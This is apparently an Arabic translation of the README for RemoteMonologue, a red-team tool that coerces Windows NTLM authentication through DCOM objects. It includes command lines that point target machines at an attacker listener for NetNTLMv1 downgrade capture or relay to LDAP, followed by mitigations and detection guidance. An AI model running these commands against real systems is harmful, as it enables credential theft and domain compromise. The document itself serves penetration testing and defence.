
تسليح DCOM لإجبار مصادقة NTLM
RemoteMonologue هي تقنية لالتقاط بيانات اعتماد ويندوز تتيح اختراق المستخدمين عن بُعد من خلال استغلال مفتاح RunAs الخاص بالمستخدم التفاعلي وإجبار مصادقات NTLM عبر DCOM.
اقرأ مقال X-Force Red RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions للحصول على معلومات مفصلة.
🔹 إجبار المصادقة عبر DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) لتحفيز مصادقة NTLM ضد مستمع محدد (-auth-to).🔹 حقن كلمات المرور (-spray)
🔹 هجوم خفض مستوى NetNTLMv1 (-downgrade)
🔹 استغلال خدمة WebClient (-webclient)
🔹 تعداد المستخدمين (-query)
ملاحظة: تتطلب صلاحيات مسؤول محلي على النظام المستهدف.
pip install impacket
فيما يلي مثال على تشغيل RemoteMonologue مع هجوم خفض مستوى NetNTLMv1 باستخدام Responder كمستمع. افتراضيًا، إذا لم يتم تحديد خيار DCOM، تستخدم الأداة كائن DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

فيما يلي مثال آخر، هذه المرة يتم تنفيذ الهجوم باستخدام كائن DCOM FileSystemImage مع تفعيل خدمة WebClient للحصول على مصادقة HTTP، والتي يتم بعد ذلك إعادة توجيهها إلى LDAP باستخدام ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

للحماية من هذه التقنيات واكتشافها، هناك عدة إجراءات وقائية وإجراءات كشف يمكن تنفيذها.
الإجراءات الوقائية:
تفعيل توقيع LDAP وربط القنوات: قم بتهيئة فرض توقيع LDAP وربط القنوات على وحدات تحكم المجال لحماية نقطة نهاية LDAP من هجمات إعادة التوجيه. ملاحظة: سيتم فرض هذه الإعدادات افتراضيًا بدءًا من Windows Server 2025.
الترقية إلى أحدث إصدارات ويندوز: قم بترقية الخوادم إلى Windows Server 2025 ومحطات العمل إلى Windows 11 الإصدار 24H2 للتخفيف من هجمات خفض مستوى NetNTLM، حيث تمت إزالة NTLMv1 في هذه الإصدارات.
فرض توقيع SMB: قم بتفعيل وفرض توقيع SMB على خوادم ويندوز لمنع هجمات إعادة توجيه SMB.
تنفيذ سياسات كلمات مرور قوية: فرض متطلبات كلمات مرور قوية لجعل هجمات كسر كلمات المرور أكثر صعوبة.
فرص الكشف:
مراقبة الوصول عن بُعد إلى كائنات DCOM: تتبع الوصول إلى كائنات DCOM المتأثرة وخصائصها وطرقها المحددة لتحديد النشاط غير المعتاد.
مراقبة تعديلات السجل: مراقبة التغييرات التي تطرأ على مفاتيح التسجيل RunAs و LmCompatibilityLevel.
تتبع نشاط خدمة WebClient: مراقبة الحالات التي يتم فيها تفعيل خدمة WebClient عن بُعد، حيث يُستخدم ذلك لتسهيل مصادقات NTLM القائمة على HTTP.